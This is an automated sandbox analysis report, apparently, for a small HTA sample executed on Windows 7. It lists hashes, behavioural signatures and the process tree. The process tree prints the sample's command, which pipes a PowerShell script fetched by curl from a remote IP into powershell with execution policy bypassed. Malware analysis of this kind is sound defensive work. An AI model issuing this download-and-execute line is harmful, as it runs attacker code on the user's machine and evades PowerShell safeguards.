Analysis
-
max time kernel
120s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
19-12-2024 07:07
Static task
static1
Behavioral task
behavioral1
Sample
script.hta
Resource
win7-20240903-en
windows7-x64
4 signatures
150 seconds
General
-
Target
script.hta
-
Size
551B
-
MD5
4041595b42e7b6e2ce5965cb76ea7da1
-
SHA1
401723ee1ac651ad359b89dd7e3cefea91d6aaa9
-
SHA256
054a6b8b84efa1127eca70abdba55e0f59fc96157504e5c9dcf0d6ff8386717f
-
SHA512
84cfba05772a5adfef0ddfe65bda07d8b908c16de04ea60942338c49a98db625801a986fd999740f61c62650b6e8ebb7f6056e76fe8656d09207f4cf9ffe7c19
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2012 wrote to memory of 2404 2012 mshta.exe 30 PID 2012 wrote to memory of 2404 2012 mshta.exe 30 PID 2012 wrote to memory of 2404 2012 mshta.exe 30 PID 2012 wrote to memory of 2404 2012 mshta.exe 30
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\script.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2012 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c curl -s http://147.45.47.15/script.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -2⤵
- System Location Discovery: System Language Discovery
PID:2404
-